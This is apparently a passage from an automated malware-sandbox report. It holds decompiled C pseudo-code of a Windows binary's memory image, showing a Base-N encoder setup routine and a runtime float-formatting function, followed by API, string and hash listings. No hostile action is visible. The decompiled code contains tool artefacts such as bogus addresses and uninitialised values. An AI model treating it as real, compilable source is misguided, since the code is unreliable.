                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					_push(_t310);
                    					_t311 = _t314;
                    					_push(0xffffffff);
                    					_push(E01417A80);
                    					_push( *[fs:0x0]);
                    					_t315 = _t314 - 0x48;
                    					_t150 =  *0x1435234; // 0x78d9f939
                    					_t151 = _t150 ^ _t311;
                    					_v148 = _t151;
                    					_push(_t213);
                    					_push(_t301);
                    					_push(_t284);
                    					_push(_t151);
                    					 *[fs:0x0] =  &_v144;
                    					_t302 = _t222;
                    					_t285 = _v124;
                    					E013E8BF0(_t213, _t285, "BaseN_Encoder", "EncodingLookupArray", _t302 + 0x18);
                    					_t214 = _t302 + 0x20;
                    					E013CED50(_t214, _t285, "BaseN_Encoder", "Log2Base", _t214);
                    					_t156 =  *_t214;
                    					__eflags = _t156;
                    					if(__eflags <= 0) {
                    						L28:
                    						_v72 = 0xf;
                    						_v76 = 0;
                    						_v92 = 0;
                    						E013C64B7( &_v92, __eflags, "BaseN_Encoder: Log2Base must be between 1 and 7 inclusive", 0x39);
                    						asm("xorps xmm0, xmm0");
                    						_v16 = 0;
                    						asm("movq [ebp-0x34], xmm0");
                    						_v16 = 1;
                    						_t226 =  &_v52;
                    						_v68 = 0x141a7b8;
                    						_v56 = 1;
                    						_v32 = 0xf;
                    						_v36 = 0;
                    						_v52 = 0;
                    						E013C63D3(_t226, _t272,  &_v92, 0, 0xffffffff);
                    						_v16 = 0;
                    						_v68 = 0x141a97c;
                    						E013F4EC6( &_v68, 0x1430adc);
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						_t163 =  *0x1435234; // 0x78d9f939
                    						 *[fs:0x0] =  &_v248;
                    						_t286 = _t226;
                    						_t303 = _v228;
                    						_t168 =  *((intOrPtr*)( *((intOrPtr*)( *_t303 + 4))))("GroupSize", 0x1435f50,  &_v308, _t163 ^ _t315, _t285, _t302,  *[fs:0x0], E01417ADC, 0xffffffff, _t311);
                    						_v260 = 0xffffffff;
                    						__eflags = _t168;
                    						_v256 = 0;
                    						_v252 = 0;
                    						_t230 =  !=  ? _v308 : 0;
                    						 *(_t286 + 0x38) = _t230;
                    						_v272 = 0;
                    						_v268 = 0;
                    						_v276 = 0;
                    						_v240 = 3;
                    						_v288 = 0xffffffff;
                    						_v284 = 0;
                    						_v280 = 0;
                    						_v300 = 0;
                    						_v296 = 0;
                    						_v304 = 0;
                    						_v240 = 7;
                    						__eflags = _t230;
                    						if(_t230 == 0) {
                    							 *((intOrPtr*)( *_t303 + 4))("Separator", 0x1435f20,  &_v52);
                    						} else {
                    							E013E8E70(_t214, _t303, "Grouper", "Separator",  &_v52);
                    						}
                    						 *((intOrPtr*)( *_t303 + 4))("Terminator", 0x1435f20,  &_v80);
                    						__eflags = _v52;
                    						if(__eflags == 0) {
                    							_t173 = _v44;
                    							_t235 = _v48;
                    						} else {
                    							_t173 = _v32;
                    							_t235 = _v28;
                    						}
                    						E013C4844(_t286 + 0x18, __eflags, _t235, _t173);
                    						__eflags = _v80;
                    						if(__eflags == 0) {
                    							_t175 = _v72;
                    							_t237 = _v76;
                    						} else {
                    							_t175 = _v60;
                    							_t237 = _v56;
                    						}
                    						E013C4844(_t286 + 0x28, __eflags, _t237, _t175);
                    						 *((intOrPtr*)(_t286 + 0x3c)) = 0;
                    						__eflags = _v64 - _v60;
                    						_v16 = 8;
                    						_t240 =  >=  ?  &_v60 :  &_v64;
                    						_t241 =  *( >=  ?  &_v60 :  &_v64);
                    						memset(_v56, 0,  *( >=  ?  &_v60 :  &_v64) << 0);
                    						L013CDA60(_v56);
                    						__eflags = _v36 - _v32;
                    						_t244 =  >=  ?  &_v32 :  &_v36;
                    						_v16 = 9;
                    						__eflags = 0;
                    						_t245 =  *( >=  ?  &_v32 :  &_v36);
                    						memset(_v28, 0,  *( >=  ?  &_v32 :  &_v36) << 0);
                    						_t184 = L013CDA60(_v28);
                    						 *[fs:0x0] = _v24;
                    						return _t184;
                    					} else {
                    						__eflags = _t156 - 8;
                    						if(__eflags >= 0) {
                    							goto L28;
                    						} else {
                    							_t189 =  *((intOrPtr*)( *((intOrPtr*)( *_t285 + 4))))("PaddingByte", 0x1438508,  &_v90);
                    							__eflags = _t189;
                    							if(_t189 == 0) {
                    								L20:
                    								_t190 = _t189 | 0xffffffff;
                    								__eflags = _t190;
                    							} else {
                    								_t189 =  *((intOrPtr*)( *((intOrPtr*)( *_t285 + 4))))("Pad", 0x1435f5c,  &_v89);
                    								__eflags = _t189;
                    								if(_t189 == 0) {
                    									L19:
                    									_t190 = _v90 & 0x000000ff;
                    								} else {
                    									__eflags = _v89;
                    									if(_v89 == 0) {
                    										goto L20;
                    									} else {
                    										goto L19;
                    									}
                    								}
                    							}
                    							_t292 =  *_t214;
                    							_t252 = 8;
                    							 *(_t302 + 0x1c) = _t190;
                    							asm("cdq");
                    							 *((intOrPtr*)(_t302 + 0x2c)) = 0;
                    							 *((intOrPtr*)(_t302 + 0x28)) = 0;
                    							__eflags = 8 % _t292;
                    							if(8 % _t292 != 0) {
                    								do {
                    									_t252 = _t252 + 8;
                    									_t198 = _t252;
                    									asm("cdq");
                    									__eflags = _t198 % _t292;
                    								} while (_t198 % _t292 != 0);
                    							}
                    							_t193 = _t252;
                    							asm("cdq");
                    							_t194 = _t193 / _t292;
                    							_t215 = _t193 / _t292;
                    							 *(_t302 + 0x24) = _t215;
                    							_t253 =  *(_t302 + 0x38);
                    							_t278 =  *(_t302 + 0x3c);
                    							__eflags = _t253 - _t215;
                    							if(_t253 != _t215) {
                    								_t294 = _t278;
                    								memset(_t294, 0, _t253 << 0);
                    								_t295 = _t294 + _t253;
                    								_t194 = L013CDA60(_t278);
                    								__eflags = _t215;
                    								if(__eflags != 0) {
                    									_t278 = E013CD9F0(0, _t295, __eflags, _t215);
                    								} else {
                    									_t278 = 0;
                    								}
                    							}
                    							 *(_t302 + 0x3c) = _t278;
                    							 *(_t302 + 0x38) = _t215;
                    							 *((intOrPtr*)(_t302 + 0x34)) = 0xffffffff;
                    							 *[fs:0x0] = _v20;
                    							__eflags = _v24 ^ _t311;
                    							return E013F268B(_t194, _v24 ^ _t311);
                    						}
                    					}
                    				} else {
                    					_t280 = _t301;
                    					 *((intOrPtr*)(__ecx + 0x2c)) = 0;
                    					 *((intOrPtr*)(__ecx + 0x28)) = 0;
                    					_t203 = _t280 & 0x80000007;
                    					if(_t203 < 0) {
                    						_t330 = (_t203 - 0x00000001 | 0xfffffff8) + 1;
                    					}
                    					if(_t330 != 0) {
                    						do {
                    							_t280 = _t280 + _t301;
                    							_t268 = _t280 & 0x80000007;
                    							if(_t268 < 0) {
                    								_t332 = (_t268 - 0x00000001 | 0xfffffff8) + 1;
                    							}
                    						} while (_t332 != 0);
                    					}
                    					asm("cdq");
                    					_t205 = _t280 + (_t280 & 0x00000007);
                    					_t308 = _t280 + (_t280 & 0x00000007) >> 3;
                    					 *(_t213 + 0x24) = _t308;
                    					_t261 =  *(_t213 + 0x38);
                    					_t282 =  *(_t213 + 0x3c);
                    					if(_t261 != _t308) {
                    						_t297 = _t282;
                    						memset(_t297, 0, _t261 << 0);
                    						_t298 = _t297 + _t261;
                    						_t205 = L013CDA60(_t282);
                    						if(_t308 != 0) {
                    							_t282 = E013CD9F0(0, _t298, __eflags, _t308);
                    						} else {
                    							_t282 = 0;
                    						}
                    					}
                    					 *(_t213 + 0x3c) = _t282;
                    					 *(_t213 + 0x38) = _t308;
                    					 *((intOrPtr*)(_t213 + 0x34)) = 0xffffffff;
                    					 *[fs:0x0] = _v16;
                    					return E013F268B(_t205, _v20 ^ _t310);
                    				}
                    			}

                    APIs
                      • Part of subcall function 013E8D30: __CxxThrowException@8.LIBVCRUNTIME ref: 013E8E41
                      • Part of subcall function 013CED50: __CxxThrowException@8.LIBVCRUNTIME ref: 013CEE61
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013E9132
                      • Part of subcall function 013CD9F0: __CxxThrowException@8.LIBVCRUNTIME ref: 013CDA54
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013E92F8
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                      • Part of subcall function 013E8E70: __CxxThrowException@8.LIBVCRUNTIME ref: 013E8F81
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$ExceptionRaise
                    • String ID: BaseN_Decoder$BaseN_Decoder: Log2Base must be between 1 and 7 inclusive$BaseN_Encoder$BaseN_Encoder: Log2Base must be between 1 and 7 inclusive$DecodingLookupArray$EncodingLookupArray$GroupSize$Grouper$Log2Base$Pad$PaddingByte$Separator$Terminator
                    • API String ID: 3476068407-2095131268
                    • Opcode ID: fe2eaa6fb0e95ba37236a66e92eea0a65117363986acd958d3bd9ecfe793809a
                    • Instruction ID: 85dd1656f5c2dd8d685e5ecdbb5de54e9f9b280f0b621620203c0150b1a0f6bb
                    • Opcode Fuzzy Hash: fe2eaa6fb0e95ba37236a66e92eea0a65117363986acd958d3bd9ecfe793809a
                    • Instruction Fuzzy Hash: 05E1A1B1A00359ABDF14CF99C898BEEBBF5EF58718F24421DE415AB390D774A904CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E014125AF(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                    				signed int _v0;
                    				signed int _v8;
                    				char _v460;
                    				signed int _v464;
                    				void _v468;
                    				signed int _v472;
                    				signed int _v932;
                    				signed int _v936;
                    				signed int _v1392;
                    				signed int _v1396;
                    				signed int _v1400;
                    				char _v1860;
                    				signed int _v1864;
                    				signed int _v1865;
                    				signed int _v1872;
                    				signed int _v1876;
                    				signed int _v1880;
                    				signed int _v1884;
                    				signed int _v1888;
                    				signed int _v1892;
                    				signed int _v1896;
                    				intOrPtr _v1900;
                    				signed int _v1904;
                    				signed int _v1908;
                    				signed int _v1912;
                    				signed int _v1916;
                    				signed int _v1920;
                    				signed int _v1924;
                    				signed int _v1928;
                    				char _v1936;
                    				char _v1944;
                    				char _v2404;
                    				signed int _v2408;
                    				signed int _v2424;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t725;
                    				signed int _t735;
                    				signed int _t736;
                    				signed int _t740;
                    				intOrPtr _t742;
                    				intOrPtr* _t743;
                    				intOrPtr* _t746;
                    				signed int _t750;
                    				signed int _t751;
                    				signed int _t757;
                    				signed int _t763;
                    				intOrPtr _t765;
                    				void* _t766;
                    				signed int _t767;
                    				signed int _t768;
                    				signed int _t769;
                    				signed int _t777;
                    				signed int _t778;
                    				signed int _t781;
                    				signed int _t782;
                    				signed int _t783;
                    				signed int _t786;
                    				signed int _t787;
                    				signed int _t788;
                    				signed int _t790;
                    				signed int _t791;
                    				signed int _t796;
                    				signed int _t797;
                    				signed int _t802;
                    				signed int _t803;
                    				signed int _t806;
                    				signed int _t810;
                    				signed int _t817;
                    				signed int* _t820;
                    				signed int _t823;
                    				signed int _t834;
                    				signed int _t835;
                    				signed int _t837;
                    				char* _t838;
                    				signed int _t840;
                    				signed int _t844;
                    				signed int _t845;
                    				signed int _t849;
                    				signed int _t851;
                    				signed int _t856;
                    				signed int _t864;
                    				signed int _t867;
                    				signed int _t869;
                    				signed int _t872;
                    				signed int _t873;
                    				signed int _t874;
                    				signed int _t877;
                    				signed int _t890;
                    				signed int _t891;
                    				signed int _t893;
                    				char* _t894;
                    				signed int _t896;
                    				signed int _t900;
                    				signed int _t901;
                    				signed int* _t903;
                    				signed int _t905;
                    				signed int _t907;
                    				signed int _t912;
                    				signed int _t919;
                    				signed int _t922;
                    				signed int _t926;
                    				signed int* _t933;
                    				intOrPtr _t935;
                    				void* _t936;
                    				intOrPtr* _t938;
                    				signed int* _t942;
                    				unsigned int _t953;
                    				signed int _t954;
                    				void* _t957;
                    				signed int _t958;
                    				void* _t960;
                    				signed int _t961;
                    				signed int _t962;
                    				signed int _t963;
                    				signed int _t971;
                    				signed int _t976;
                    				signed int _t979;
                    				unsigned int _t982;
                    				signed int _t983;
                    				void* _t986;
                    				signed int _t987;
                    				void* _t989;
                    				signed int _t990;
                    				signed int _t991;
                    				signed int _t992;
                    				signed int _t996;
                    				signed int* _t1001;
                    				signed int _t1003;
                    				signed int _t1013;
                    				void _t1016;
                    				signed int _t1019;
                    				void* _t1022;
                    				signed int _t1033;
                    				signed int _t1034;
                    				signed int _t1037;
                    				signed int _t1038;
                    				signed int _t1040;
                    				signed int _t1041;
                    				signed int _t1042;
                    				signed int _t1046;
                    				signed int _t1050;
                    				signed int _t1051;
                    				signed int _t1052;
                    				signed int _t1054;
                    				signed int _t1055;
                    				signed int _t1056;
                    				signed int _t1057;
                    				signed int _t1058;
                    				signed int _t1059;
                    				signed int _t1061;
                    				signed int _t1062;
                    				signed int _t1063;
                    				signed int _t1064;
                    				signed int _t1065;
                    				signed int _t1066;
                    				unsigned int _t1067;
                    				void* _t1070;
                    				intOrPtr _t1072;
                    				signed int _t1073;
                    				signed int _t1074;
                    				signed int _t1075;
                    				signed int* _t1079;
                    				void* _t1083;
                    				void* _t1084;
                    				signed int _t1085;
                    				signed int _t1086;
                    				signed int _t1087;
                    				signed int _t1090;
                    				signed int _t1091;
                    				signed int _t1096;
                    				signed int _t1098;
                    				signed int _t1101;
                    				char _t1106;
                    				signed int _t1108;
                    				signed int _t1109;
                    				signed int _t1110;
                    				signed int _t1111;
                    				signed int _t1112;
                    				signed int _t1113;
                    				signed int _t1114;
                    				signed int _t1118;
                    				signed int _t1119;
                    				signed int _t1120;
                    				signed int _t1121;
                    				signed int _t1122;
                    				unsigned int _t1125;
                    				void* _t1129;
                    				void* _t1130;
                    				unsigned int _t1131;
                    				signed int _t1136;
                    				signed int _t1137;
                    				signed int _t1139;
                    				signed int _t1140;
                    				intOrPtr* _t1142;
                    				signed int _t1143;
                    				signed int _t1144;
                    				signed int _t1147;
                    				signed int _t1148;
                    				signed int _t1151;
                    				signed int _t1153;
                    				signed int _t1154;
                    				void* _t1155;
                    				signed int _t1156;
                    				signed int _t1157;
                    				signed int _t1158;
                    				void* _t1161;
                    				signed int _t1162;
                    				signed int _t1163;
                    				signed int _t1164;
                    				signed int _t1165;
                    				signed int _t1166;
                    				signed int* _t1169;
                    				signed int _t1170;
                    				signed int _t1171;
                    				signed int _t1172;
                    				signed int _t1173;
                    				intOrPtr* _t1175;
                    				intOrPtr* _t1176;
                    				signed int _t1178;
                    				signed int _t1180;
                    				signed int _t1183;
                    				signed int _t1189;
                    				signed int _t1193;
                    				signed int _t1194;
                    				intOrPtr _t1196;
                    				intOrPtr _t1197;
                    				signed int _t1202;
                    				signed int _t1205;
                    				signed int _t1206;
                    				signed int _t1207;
                    				signed int _t1208;
                    				signed int _t1209;
                    				signed int _t1210;
                    				signed int _t1212;
                    				signed int _t1213;
                    				signed int _t1214;
                    				signed int _t1215;
                    				signed int _t1217;
                    				signed int _t1218;
                    				signed int _t1219;
                    				signed int _t1220;
                    				signed int _t1221;
                    				signed int _t1223;
                    				signed int _t1224;
                    				signed int _t1226;
                    				signed int _t1228;
                    				signed int _t1230;
                    				signed int _t1232;
                    				signed int* _t1234;
                    				signed int* _t1238;
                    				signed int _t1247;
                    
                    				_t725 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t725 ^ _t1232;
                    				_t1013 = _a20;
                    				_t1142 = _a16;
                    				_v1924 = _t1142;
                    				_v1920 = _t1013;
                    				E01412585( &_v1944, __eflags);
                    				_t1193 = _a8;
                    				_t730 = 0x2d;
                    				if((_t1193 & 0x80000000) == 0) {
                    					_t730 = 0x120;
                    				}
                    				 *_t1142 = _t730;
                    				 *((intOrPtr*)(_t1142 + 8)) = _t1013;
                    				_t1143 = _a4;
                    				if((_t1193 & 0x7ff00000) != 0) {
                    					L5:
                    					_t735 = E0140A8BD( &_a4);
                    					_pop(_t1028);
                    					__eflags = _t735;
                    					if(_t735 != 0) {
                    						_t1028 = _v1924;
                    						 *((intOrPtr*)(_v1924 + 4)) = 1;
                    					}
                    					_t736 = _t735 - 1;
                    					__eflags = _t736;
                    					if(_t736 == 0) {
                    						_push("1#INF");
                    						goto L308;
                    					} else {
                    						_t750 = _t736 - 1;
                    						__eflags = _t750;
                    						if(_t750 == 0) {
                    							_push("1#QNAN");
                    							goto L308;
                    						} else {
                    							_t751 = _t750 - 1;
                    							__eflags = _t751;
                    							if(_t751 == 0) {
                    								_push("1#SNAN");
                    								goto L308;
                    							} else {
                    								__eflags = _t751 == 1;
                    								if(_t751 == 1) {
                    									_push("1#IND");
                    									goto L308;
                    								} else {
                    									_v1928 = _v1928 & 0x00000000;
                    									_a4 = _t1143;
                    									_a8 = _t1193 & 0x7fffffff;
                    									_t1247 = _a4;
                    									asm("fst qword [ebp-0x768]");
                    									_t1147 = _v1896;
                    									_v1916 = _a12 + 1;
                    									_t1033 = _t1147 >> 0x14;
                    									_t757 = _t1033 & 0x000007ff;
                    									__eflags = _t757;
                    									if(_t757 != 0) {
                    										_t1098 = 0;
                    										_t757 = 0;
                    										__eflags = 0;
                    									} else {
                    										_t1098 = 1;
                    									}
                    									_t1148 = _t1147 & 0x000fffff;
                    									_t1016 = _v1900 + _t757;
                    									asm("adc edi, esi");
                    									__eflags = _t1098;
                    									_t1034 = _t1033 & 0x000007ff;
                    									_t1202 = _t1034 - 0x434 + (0 | _t1098 != 0x00000000) + 1;
                    									_v1872 = _t1202;
                    									E01414650(_t1034, _t1247);
                    									_push(_t1034);
                    									_push(_t1034);
                    									 *_t1234 = _t1247;
                    									_t763 = E013F2890(E01414760(), _t1247);
                    									_v1904 = _t763;
                    									__eflags = _t763 - 0x7fffffff;
                    									if(_t763 == 0x7fffffff) {
                    										L16:
                    										__eflags = 0;
                    										_v1904 = 0;
                    									} else {
                    										__eflags = _t763 - 0x80000000;
                    										if(_t763 == 0x80000000) {
                    											goto L16;
                    										}
                    									}
                    									_v468 = _t1016;
                    									__eflags = _t1148;
                    									_v464 = _t1148;
                    									_t1019 = (0 | _t1148 != 0x00000000) + 1;
                    									_v472 = _t1019;
                    									__eflags = _t1202;
                    									if(_t1202 < 0) {
                    										__eflags = _t1202 - 0xfffffc02;
                    										if(_t1202 == 0xfffffc02) {
                    											L101:
                    											_t765 =  *((intOrPtr*)(_t1232 + _t1019 * 4 - 0x1d4));
                    											_t195 =  &_v1896;
                    											 *_t195 = _v1896 & 0x00000000;
                    											__eflags =  *_t195;
                    											asm("bsr eax, eax");
                    											if( *_t195 == 0) {
                    												_t1037 = 0;
                    												__eflags = 0;
                    											} else {
                    												_t1037 = _t765 + 1;
                    											}
                    											_t766 = 0x20;
                    											_t767 = _t766 - _t1037;
                    											__eflags = _t767 - 1;
                    											_t768 = _t767 & 0xffffff00 | _t767 - 0x00000001 > 0x00000000;
                    											__eflags = _t1019 - 0x73;
                    											_v1865 = _t768;
                    											_t1038 = _t1037 & 0xffffff00 | _t1019 - 0x00000073 > 0x00000000;
                    											__eflags = _t1019 - 0x73;
                    											if(_t1019 != 0x73) {
                    												L107:
                    												_t769 = 0;
                    												__eflags = 0;
                    											} else {
                    												__eflags = _t768;
                    												if(_t768 == 0) {
                    													goto L107;
                    												} else {
                    													_t769 = 1;
                    												}
                    											}
                    											__eflags = _t1038;
                    											if(_t1038 != 0) {
                    												L126:
                    												_v1400 = _v1400 & 0x00000000;
                    												_t224 =  &_v472;
                    												 *_t224 = _v472 & 0x00000000;
                    												__eflags =  *_t224;
                    												_push(0);
                    												_push( &_v1396);
                    												_push(0x1cc);
                    												_push( &_v468);
                    												L313();
                    												_t1234 =  &(_t1234[4]);
                    											} else {
                    												__eflags = _t769;
                    												if(_t769 != 0) {
                    													goto L126;
                    												} else {
                    													_t1065 = 0x72;
                    													__eflags = _t1019 - _t1065;
                    													if(_t1019 < _t1065) {
                    														_t1065 = _t1019;
                    													}
                    													__eflags = _t1065 - 0xffffffff;
                    													if(_t1065 != 0xffffffff) {
                    														_t1220 = _t1065;
                    														_t1175 =  &_v468 + _t1065 * 4;
                    														_v1880 = _t1175;
                    														while(1) {
                    															__eflags = _t1220 - _t1019;
                    															if(_t1220 >= _t1019) {
                    																_t208 =  &_v1876;
                    																 *_t208 = _v1876 & 0x00000000;
                    																__eflags =  *_t208;
                    															} else {
                    																_v1876 =  *_t1175;
                    															}
                    															_t210 = _t1220 - 1; // 0x70
                    															__eflags = _t210 - _t1019;
                    															if(_t210 >= _t1019) {
                    																_t1125 = 0;
                    																__eflags = 0;
                    															} else {
                    																_t1125 =  *(_t1175 - 4);
                    															}
                    															_t1175 = _t1175 - 4;
                    															_t933 = _v1880;
                    															_t1220 = _t1220 - 1;
                    															 *_t933 = _t1125 >> 0x0000001f ^ _v1876 + _v1876;
                    															_v1880 = _t933 - 4;
                    															__eflags = _t1220 - 0xffffffff;
                    															if(_t1220 == 0xffffffff) {
                    																break;
                    															}
                    															_t1019 = _v472;
                    														}
                    														_t1202 = _v1872;
                    													}
                    													__eflags = _v1865;
                    													if(_v1865 == 0) {
                    														_v472 = _t1065;
                    													} else {
                    														_t218 = _t1065 + 1; // 0x73
                    														_v472 = _t218;
                    													}
                    												}
                    											}
                    											_t1151 = 1 - _t1202;
                    											E013F5890(_t1151,  &_v1396, 0, 1);
                    											__eflags = 1;
                    											 *(_t1232 + 0xbad63d) = 1 << (_t1151 & 0x0000001f);
                    											_t777 = 0xbadbae;
                    										} else {
                    											_v1396 = _v1396 & 0x00000000;
                    											_t1066 = 2;
                    											_v1392 = 0x100000;
                    											_v1400 = _t1066;
                    											__eflags = _t1019 - _t1066;
                    											if(_t1019 == _t1066) {
                    												_t1129 = 0;
                    												__eflags = 0;
                    												while(1) {
                    													_t935 =  *((intOrPtr*)(_t1232 + _t1129 - 0x570));
                    													__eflags = _t935 -  *((intOrPtr*)(_t1232 + _t1129 - 0x1d0));
                    													if(_t935 !=  *((intOrPtr*)(_t1232 + _t1129 - 0x1d0))) {
                    														goto L101;
                    													}
                    													_t1129 = _t1129 + 4;
                    													__eflags = _t1129 - 8;
                    													if(_t1129 != 8) {
                    														continue;
                    													} else {
                    														_t166 =  &_v1896;
                    														 *_t166 = _v1896 & 0x00000000;
                    														__eflags =  *_t166;
                    														asm("bsr eax, edi");
                    														if( *_t166 == 0) {
                    															_t1130 = 0;
                    															__eflags = 0;
                    														} else {
                    															_t1130 = _t935 + 1;
                    														}
                    														_t936 = 0x20;
                    														_t1221 = _t1066;
                    														__eflags = _t936 - _t1130 - _t1066;
                    														_t938 =  &_v460;
                    														_v1880 = _t938;
                    														_t1176 = _t938;
                    														_t171 =  &_v1865;
                    														 *_t171 = _t936 - _t1130 - _t1066 > 0;
                    														__eflags =  *_t171;
                    														while(1) {
                    															__eflags = _t1221 - _t1019;
                    															if(_t1221 >= _t1019) {
                    																_t173 =  &_v1876;
                    																 *_t173 = _v1876 & 0x00000000;
                    																__eflags =  *_t173;
                    															} else {
                    																_v1876 =  *_t1176;
                    															}
                    															_t175 = _t1221 - 1; // 0x0
                    															__eflags = _t175 - _t1019;
                    															if(_t175 >= _t1019) {
                    																_t1131 = 0;
                    																__eflags = 0;
                    															} else {
                    																_t1131 =  *(_t1176 - 4);
                    															}
                    															_t1176 = _t1176 - 4;
                    															_t942 = _v1880;
                    															_t1221 = _t1221 - 1;
                    															 *_t942 = _t1131 >> 0x0000001e ^ _v1876 << 0x00000002;
                    															_v1880 = _t942 - 4;
                    															__eflags = _t1221 - 0xffffffff;
                    															if(_t1221 == 0xffffffff) {
                    																break;
                    															}
                    															_t1019 = _v472;
                    														}
                    														__eflags = _v1865;
                    														_t1067 = _t1066 - _v1872;
                    														_v472 = (0 | _v1865 != 0x00000000) + _t1066;
                    														_t1178 = _t1067 >> 5;
                    														_v1884 = _t1067;
                    														_t1223 = _t1178 << 2;
                    														E013F5890(_t1178,  &_v1396, 0, _t1223);
                    														 *(_t1232 + _t1223 - 0x570) = 1 << (_v1884 & 0x0000001f);
                    														_t777 = _t1178 + 1;
                    													}
                    													goto L128;
                    												}
                    											}
                    											goto L101;
                    										}
                    										L128:
                    										_v1400 = _t777;
                    										_t1022 = 0x1cc;
                    										_v936 = _t777;
                    										_t778 = _t777 << 2;
                    										__eflags = _t778;
                    										_push(_t778);
                    										_push( &_v1396);
                    										_push(0x1cc);
                    										_push( &_v932);
                    										L313();
                    										_t1238 =  &(_t1234[7]);
                    									} else {
                    										_v1396 = _v1396 & 0x00000000;
                    										_t1224 = 2;
                    										_v1392 = 0x100000;
                    										_v1400 = _t1224;
                    										__eflags = _t1019 - _t1224;
                    										if(_t1019 != _t1224) {
                    											L53:
                    											_t953 = _v1872 + 1;
                    											_t954 = _t953 & 0x0000001f;
                    											_t1070 = 0x20;
                    											_v1876 = _t954;
                    											_t1180 = _t953 >> 5;
                    											_v1872 = _t1180;
                    											_v1908 = _t1070 - _t954;
                    											_t957 = E013F30E0(1, _t1070 - _t954, 0);
                    											_t1072 =  *((intOrPtr*)(_t1232 + _t1019 * 4 - 0x1d4));
                    											_t958 = _t957 - 1;
                    											_t108 =  &_v1896;
                    											 *_t108 = _v1896 & 0x00000000;
                    											__eflags =  *_t108;
                    											asm("bsr ecx, ecx");
                    											_v1884 = _t958;
                    											_v1912 =  !_t958;
                    											if( *_t108 == 0) {
                    												_t1073 = 0;
                    												__eflags = 0;
                    											} else {
                    												_t1073 = _t1072 + 1;
                    											}
                    											_t960 = 0x20;
                    											_t961 = _t960 - _t1073;
                    											_t1136 = _t1019 + _t1180;
                    											__eflags = _v1876 - _t961;
                    											_v1892 = _t1136;
                    											_t962 = _t961 & 0xffffff00 | _v1876 - _t961 > 0x00000000;
                    											__eflags = _t1136 - 0x73;
                    											_v1865 = _t962;
                    											_t1074 = _t1073 & 0xffffff00 | _t1136 - 0x00000073 > 0x00000000;
                    											__eflags = _t1136 - 0x73;
                    											if(_t1136 != 0x73) {
                    												L59:
                    												_t963 = 0;
                    												__eflags = 0;
                    											} else {
                    												__eflags = _t962;
                    												if(_t962 == 0) {
                    													goto L59;
                    												} else {
                    													_t963 = 1;
                    												}
                    											}
                    											__eflags = _t1074;
                    											if(_t1074 != 0) {
                    												L81:
                    												__eflags = 0;
                    												_t1022 = 0x1cc;
                    												_push(0);
                    												_v1400 = 0;
                    												_v472 = 0;
                    												_push( &_v1396);
                    												_push(0x1cc);
                    												_push( &_v468);
                    												L313();
                    												_t1234 =  &(_t1234[4]);
                    											} else {
                    												__eflags = _t963;
                    												if(_t963 != 0) {
                    													goto L81;
                    												} else {
                    													_t1075 = 0x72;
                    													__eflags = _t1136 - _t1075;
                    													if(_t1136 >= _t1075) {
                    														_t1136 = _t1075;
                    														_v1892 = _t1075;
                    													}
                    													_t971 = _t1136;
                    													_v1880 = _t971;
                    													__eflags = _t1136 - 0xffffffff;
                    													if(_t1136 != 0xffffffff) {
                    														_t1137 = _v1872;
                    														_t1226 = _t1136 - _t1137;
                    														__eflags = _t1226;
                    														_t1079 =  &_v468 + _t1226 * 4;
                    														_v1888 = _t1079;
                    														while(1) {
                    															__eflags = _t971 - _t1137;
                    															if(_t971 < _t1137) {
                    																break;
                    															}
                    															__eflags = _t1226 - _t1019;
                    															if(_t1226 >= _t1019) {
                    																_t1183 = 0;
                    																__eflags = 0;
                    															} else {
                    																_t1183 =  *_t1079;
                    															}
                    															__eflags = _t1226 - 1 - _t1019;
                    															if(_t1226 - 1 >= _t1019) {
                    																_t976 = 0;
                    																__eflags = 0;
                    															} else {
                    																_t976 =  *(_t1079 - 4);
                    															}
                    															_t979 = _v1880;
                    															_t1079 = _v1888 - 4;
                    															_v1888 = _t1079;
                    															 *(_t1232 + _t979 * 4 - 0x1d0) = (_t1183 & _v1884) << _v1876 | (_t976 & _v1912) >> _v1908;
                    															_t971 = _t979 - 1;
                    															_t1226 = _t1226 - 1;
                    															_v1880 = _t971;
                    															__eflags = _t971 - 0xffffffff;
                    															if(_t971 != 0xffffffff) {
                    																_t1019 = _v472;
                    																continue;
                    															}
                    															break;
                    														}
                    														_t1136 = _v1892;
                    														_t1180 = _v1872;
                    														_t1224 = 2;
                    													}
                    													__eflags = _t1180;
                    													if(_t1180 != 0) {
                    														__eflags = 0;
                    														memset( &_v468, 0, _t1180 << 2);
                    														_t1234 =  &(_t1234[3]);
                    													}
                    													__eflags = _v1865;
                    													_t1022 = 0x1cc;
                    													if(_v1865 == 0) {
                    														_v472 = _t1136;
                    													} else {
                    														_v472 = _t1136 + 1;
                    													}
                    												}
                    											}
                    											_v1392 = _v1392 & 0x00000000;
                    											_v1396 = _t1224;
                    											_v1400 = 1;
                    											_v936 = 1;
                    											_push(4);
                    										} else {
                    											_t1083 = 0;
                    											__eflags = 0;
                    											while(1) {
                    												__eflags =  *((intOrPtr*)(_t1232 + _t1083 - 0x570)) -  *((intOrPtr*)(_t1232 + _t1083 - 0x1d0));
